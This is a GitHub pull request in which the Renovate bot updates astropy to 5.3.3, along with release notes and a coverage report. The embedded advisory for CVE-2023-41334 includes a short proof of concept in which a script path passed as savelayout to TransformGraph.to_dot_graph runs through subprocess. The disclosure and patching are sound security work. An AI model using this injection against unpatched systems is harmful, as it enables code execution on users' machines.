Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

chore(deps): update dependency astropy to v5.3.3 [security] #533

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

chore(deps): update dependency astropy to v5.3.3 [security] #533

wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Mar 18, 2024

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
astropy 5.2.2 -> 5.3.3 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2023-41334

Summary

RCE due to improper input validation in TranformGraph().to_dot_graph function

Details

Due to improper input validation a malicious user can provide a command or a script file as a value to savelayout argument, which will be placed as the first value in a list of arguments passed to subprocess.Popen.
https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539
Although an error will be raised, the command or script will be executed successfully.

PoC

$ cat /tmp/script

#!/bin/bash
echo astrorce > /tmp/poc.txt
$ python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44) 
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from astropy.coordinates.transformations import TransformGraph
>>> tg = TransformGraph()
>>> tg.to_dot_graph(savefn="/tmp/1.txt", savelayout="/tmp/script")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py", line 584, in to_dot_graph
    stdout, stderr = proc.communicate(dotgraph)
  File "/usr/lib/python3.9/subprocess.py", line 1134, in communicate
    stdout, stderr = self._communicate(input, endtime, timeout)
  File "/usr/lib/python3.9/subprocess.py", line 1961, in _communicate
    input_view = memoryview(self._input)
TypeError: memoryview: a bytes-like object is required, not 'str'
>>> 
$ cat /tmp/poc.txt
astrorce

Impact

code execution on the user's machine

Release Notes

astropy/astropy (astropy)

v5.3.3

Compare Source

===========================

Bug Fixes

astropy.coordinates
^^^^^^^^^^^^^^^^^^^

  • TransformGraph.to_dot_graph() now throws an exception for invalid savelayout.

astropy.cosmology
^^^^^^^^^^^^^^^^^

  • The exponent of w0wzCDM functions in inv_efunc has been corrected to 3, from -3. [#​15224]

astropy.modeling
^^^^^^^^^^^^^^^^

  • Astropy modeling can filter non-finite data values using the filter_non_finite
    keyword argument in a fitter call. Now when filter_non_finite is True,
    non-finite weights will also be filtered to prevent crashes in LevMarLSQFitter. [#​15215]

astropy.units
^^^^^^^^^^^^^

  • Fixed astropy.units.Quantity's implementation of numpy.nanmedian(),
    where for Numpy >= 1.25 an exception was raised for some array shapes and axis
    combinations. [#​15228]

Other Changes and Additions

  • v5.3.x will not support NumPy 2.0 or later. [#​15234]

v5.3.2

Compare Source

==========================

Bug Fixes

astropy.coordinates
^^^^^^^^^^^^^^^^^^^

  • Fixed import when called with Python -OO flag. [#​15037]

astropy.nddata
^^^^^^^^^^^^^^

  • Fix for collapse operations on NDData without masks or units. [#​15082]

astropy.units
^^^^^^^^^^^^^

  • Modified the implementation of np.power() for instances of Quantity to
    allow any array as the second operand if all its elements have the same value. [#​15101]

v5.3.1

Compare Source

==========================

Bug Fixes

astropy.cosmology
^^^^^^^^^^^^^^^^^

  • The exponent in wowzCDM.de_density_scale has been corrected to 3, from -3. [#​14991]

astropy.io.fits
^^^^^^^^^^^^^^^

  • Fix crash when a PrimaryHDU has a GROUPS keyword with a non-boolean value (i.e.
    not a random-groups HDU). [#​14998]

  • Fixed a bug that caused Cutout2D to not work correctly with CompImageHDU.section [#​14999]

  • Fixed a bug that caused compressed images with TFORM missing the optional '1' prefix to not be readable. [#​15001]

astropy.modeling
^^^^^^^^^^^^^^^^

astropy.nddata
^^^^^^^^^^^^^^

  • Restore bitmask propagation behavior in NDData.mask, plus a fix
    for arithmetic between masked and unmasked NDData objects. [#​14995]

astropy.table
^^^^^^^^^^^^^

  • Fix a bug where table indexes were not using a stable sort order. This was causing the
    order of rows within groups to not match the original table order when an indexed table
    was grouped. [#​14907]

astropy.units
^^^^^^^^^^^^^

  • In VOunits, "pix", "au", "a", and "ct" are removed from the list of deprecated units. [#​14885]

v5.3

Compare Source

==========================

Bug Fixes

astropy.io.misc
^^^^^^^^^^^^^^^

  • Updated astropy.io.misc.yaml so dump()` with a numpy object array orload()with YAML representing a Numpy object array both raiseTypeError``. This prevents problems like a segmentation fault. [#​15373]

astropy.io.votable
^^^^^^^^^^^^^^^^^^

  • Fixed a bug in convert_to_writable_filelike where GzipFile was not
    closed properly. [#​15359]

astropy.units
^^^^^^^^^^^^^

  • In VOUnit, the spaces around the slash were removed in the formatting of
    fractions, and fractional powers now also use the "**" operator. [#​15282]

  • We now ensure that the unit u.cgs.cm is just an alias of u.si.cm,
    instead of a redefinition. This ensures that u.Unit("cm") / u.cm
    will reliably cancel to dimensionless (instead of some "cm / cm"). [#​15368]

astropy.utils
^^^^^^^^^^^^^

  • For Masked, np.ptp and the .ptp() method now properly account for
    the mask, ensuring the result is identical to subtracting the maximum and
    minimum (with the same arguments). [#​15380]

Other Changes and Additions

  • Compatibility with Python 3.12. [#​14784]

  • Replaced the URL of IETF_LEAP_SECOND_URL because the original is now
    defunct and IETF now defers to IANA for such look-up. [#​15421]

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.

@renovate renovate bot added the dependencies Pull requests that update a dependency file label Mar 18, 2024
@codecov Codecov
Copy link

codecov bot commented Mar 18, 2024

Codecov Report

All modified and coverable lines are covered by tests ✅

Project coverage is 18.47%. Comparing base (7406a2a) to head (d56f675).

Additional details and impacted files 
@@           Coverage Diff           @@
##             main     #533   +/-   ##
=======================================
  Coverage   18.47%   18.47%           
=======================================
  Files          29       29           
  Lines        3631     3631           
  Branches      477      477           
=======================================
  Hits          671      671           
  Misses       2951     2951           
  Partials        9        9

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
dependencies Pull requests that update a dependency file
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
0 participants